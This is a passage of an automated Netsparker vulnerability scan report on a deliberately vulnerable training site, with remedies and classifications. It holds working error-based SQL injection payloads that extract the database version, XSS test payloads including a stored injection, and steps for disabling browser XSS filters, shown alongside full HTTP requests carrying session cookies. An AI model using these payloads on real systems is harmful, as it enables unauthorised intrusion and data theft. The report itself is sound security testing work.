3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat Sheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP 2010-A1, OWASP 2013-A1, PCI V2.0-6.5.1, PCI V3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
2.1 /api/vote CONFIRMED http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter   Type  Value
userId      POST  1
supercarId  POST  3
comments    POST  (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27
Response
…P.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1
{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b
Parameters
Parameter  Type  Value
orderBy    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
asc        GET   false
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8
<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8
2.4 /Make/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8
2.5 /Make/1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA
Parameters
Parameter  Type  Value
orderby    GET   (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR
Extracted Data
microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8
1 TOTAL IMPORTANT
1 CONFIRMED
3 Cross-site Scripting
Netsparker detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
- Hijacking the user's active session
- Mounting phishing attacks
- Intercepting data and performing man-in-the-middle attacks
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes into a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used for other than testing purposes. Even though browsers have certain checks to prevent cross-site scripting attacks, in practice there are a variety of ways to bypass this mechanism; therefore a web application should not rely on this kind of client-side browser check.
Chrome
Open a command prompt. Go to the folder where chrome.exe is located. Run the command: chrome.exe --args --disable-xss-auditor
Internet Explorer
Click Tools -> Internet Options and then navigate to the Security tab. Click Custom level and scroll towards the bottom, where you will find that Enable XSS filter is currently Enabled. Set it to Disabled. Click OK. Click Yes to accept the warning, followed by Apply.
Firefox
Go to about:config in the URL address bar. In the search field type urlbar.filter and find browser.urlbar.filter.javascript. Set its value to false by double clicking the row.
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
3.1 /Search CONFIRMED http://hackyourselffirst.troyhunt.com/Search?searchTerm='%2Bnetsparker(9)%2B'
Parameters
Parameter   Type  Value
searchTerm  GET   '+netsparker(9)+'
Request
GET /Search?searchTerm='%2Bnetsparker(9)%2B' HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
…</section></div></div></div></div></header>
<div class="container"><section>
<h2>You searched for &quot;<span id="searchTerm">'+netsparker(9)+'</span>&quot;</h2>
<p class="alert alert-error">No results found for your search</p>
</section><hr><footer><p>&copy; 2014 - Hack Yourself First</p></footer>
…></script>
<script>$('#results tr').click(function () { var url = '/Supercar/' + $(this).attr('id'); window.location.href = url; });
$('#searchTerm').val(''+netsparker(9)+'');</script>
<script>(function (i, s, o, g, r, a, m) { i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () { (i[r].q = i[r].q || []).push(arguments) }, i[r…
1 TOTAL IMPORTANT
1 CONFIRMED
4 Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript within the browser.
Permanent means that the attack will be stored in the backend system. In normal XSS attacks an attacker needs to e-mail the victim, but in a permanent XSS an attacker can just execute the attack and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.
Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.
Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI V2.0-6.5.7, PCI V3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
4.1 /Supercar/3 CONFIRMED http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e
Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1
Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
1 TOTAL IMPORTANT
1 CONFIRMED
5 Password Transmitted over HTTP
Netsparker detected that password data is being transmitted over HTTP.
Impact
If an attacker can intercept network traffic, he/she can steal users' credentials.
Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.
Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-319, CAPEC-65, WASC-04
5.1 /Account/Register CONFIRMED http://hackyourselffirst.troyhunt.com/Account/Register
Form target action: http://hackyourselffirst.troyhunt.com/Account/Register
Request
GET /Account/Register HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding: 
Content-Length: 2265
Content-Type: text/html; charset=utf-8
<!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><title>Register - Supercar Showdown</title><link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" /><meta name="viewport" content="width=device-width" /><link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner"><button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a><div class="nav-collapse collapse"><ul class="nav"><li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li><li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a><ul class="dropdown-menu"><form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form><li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li><li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li>
…
1 TOTAL IMPORTANT
1 CONFIRMED
6 Cookie Not Marked as Secure
Netsparker identified a cookie not marked as secure, and transmitted over HTTPS.
This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic, or following a successful man-in-the-middle attack.
Impact
This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie), an attacker might intercept it and hijack a victim's session. If the attacker can carry out a man-in-the-middle attack, he/she can force the victim to make an HTTP request to steal the cookie.
Actions to Take
1. See the remedy for solution.
2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information, you do not have to mark it as secure.)
Remedy
Mark all cookies used within the application as secure.
Required Skills for Successful Exploitation
To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or to the victim's network. Attackers need to understand layer 2, have physical access to systems either as waypoints for the traffic, or have locally gained access to a system between the victim and the web server.
External References
.NET Cookie.Secure Property
How to Create Totally Secure Cookies
Classification
OWASP 2010-A9, OWASP 2013-A6, PCI V2.0-6.5.4, PCI V3.0-6.5.4, CWE-614, CAPEC-102, WASC-15
6.1 /Account/Login CONFIRMED https://hackyourselffirst.troyhunt.com/Account/Login
Identified Cookie: AuthCookie
Request
POST /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/Account/Login
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=EA9A3D322DD4B030B3239FA3119364226C4AFC1146DACC18C04B897769A79F835F0F451B34A8B312CD8F5A77E3B5421B58074E3E4C68E5FA779CCC709E259C828EFF4936F4BB152D308EA778C82324B3CAF1BA60C0C18C134AEB7C5A5153AF181C536B617EF3F6DFB1052DDB94CFEB3F91DCFE08967136E4266A5E8249781E2F; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 57
Content-Type: application/x-www-form-urlencoded

Email=netsparker%40example.com&Password=3&RememberMe=true
21 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
IMPORTANT: 1 total

7 Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.
Impact: Since this is an old version of the software, it may be vulnerable to attacks.
Remedy: Please upgrade your installation of Microsoft SQL Server to the latest stable version.
Classification: OWASP 2010-A6, OWASP 2013-A9, PCI V2.0-6.1, PCI V3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…
Identified Version: 11.0.9222.17
Latest Version: 12.0.2000
Vulnerability Database: Result is based on 18/08/2014 vulnerability database content
Certainty:
Caveat: the @@version string extracted through the injection in 2.1 and 2.2 reads "microsoft sql azure (rtm) - 11.0.9222.17", i.e. Azure SQL Database. Its engine version is managed by Microsoft rather than by the application owner, and its build numbers are not directly comparable with the on-premises SQL Server 2014 build (12.0.2000) the scanner treats as "latest". Treat this item as informational; the actionable finding is the SQL injection that disclosed the version string.
Request:
